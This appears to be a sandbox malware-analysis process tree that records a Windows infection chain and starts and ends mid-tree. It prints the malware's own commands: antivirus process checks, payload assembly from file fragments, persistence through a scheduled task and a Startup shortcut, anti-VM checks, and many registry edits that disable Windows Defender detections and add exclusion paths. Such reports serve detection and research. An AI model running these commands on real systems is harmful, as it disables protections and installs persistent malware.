C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1008 -
C:\Windows\SysWOW64\cmd.execmd /c md 1939976⤵
- System Location Discovery: System Language Discovery
PID:3532 -
C:\Windows\SysWOW64\findstr.exefindstr /V "JulieAppMagneticWhenever" Hist6⤵PID:1596
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y6⤵PID:3652
-
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pifRestructuring.pif y6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4876 -
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:4404 -
C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe"C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit5⤵PID:4644
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1008 -
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"6⤵
- System Location Discovery: System Language Discovery
PID:2460 -
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4232 -
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1928 -
C:\Windows\SysWOW64\cmd.execmd /c md 403656⤵PID:3936
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s6⤵
- System Location Discovery: System Language Discovery
PID:4552 -
C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pifBeijing.pif s6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3196 -
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵PID:4156
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F2⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:1692 -
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & echo URL="C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & exit2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:5112 -
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pifC:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif2⤵
- Executes dropped EXE
PID:456
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4316,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4152 /prefetch:81⤵PID:3144
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4444
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=3052,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=2272 /prefetch:31⤵PID:3808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2924 -ip 29241⤵PID:4780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2924 -ip 29241⤵PID:3536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2924 -ip 29241⤵PID:1316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2924 -ip 29241⤵PID:2576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2924 -ip 29241⤵PID:544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2924 -ip 29241⤵PID:4788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2924 -ip 29241⤵PID:4020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2924 -ip 29241⤵PID:116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2924 -ip 29241⤵PID:3476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2924 -ip 29241⤵PID:1612
-
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe1⤵
- Executes dropped EXE
PID:3484 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 4442⤵
- Program crash
PID:4544
-
C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe wc /ydidAPN 385133 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- System Location Discovery: System Language Discovery
PID:544 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4068 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:1816
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:5096
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:4416 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:1316
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:4800
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1708 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:224
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2900 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:1612 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:2468
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:4696 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
PID:1732 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:4800
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3384 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
- System Location Discovery: System Language Discovery
PID:1464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4284 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4544 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2576
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4656
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1932 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:116
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1908 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1464
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2380 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3932 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4544 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4832
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4776
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1992
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3340
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4400
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5040
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4548 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3268
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3836 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1140 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1300 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2888
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4948 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4228
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4544
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2868
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:4420
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4696
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IfTYFdYohdhRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IfTYFdYohdhRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cBfgrRECHDYJtCCxauR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cBfgrRECHDYJtCCxauR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgvwDscPBpUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgvwDscPBpUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sozrmRSxWUyU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sozrmRSxWUyU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xFHhRZnoU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xFHhRZnoU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\asFrGLUBkJEUSBVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\asFrGLUBkJEUSBVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gXItsKzEGiJHAsry\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gXItsKzEGiJHAsry\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3488 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:323⤵PID:3836
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:324⤵PID:2280
-
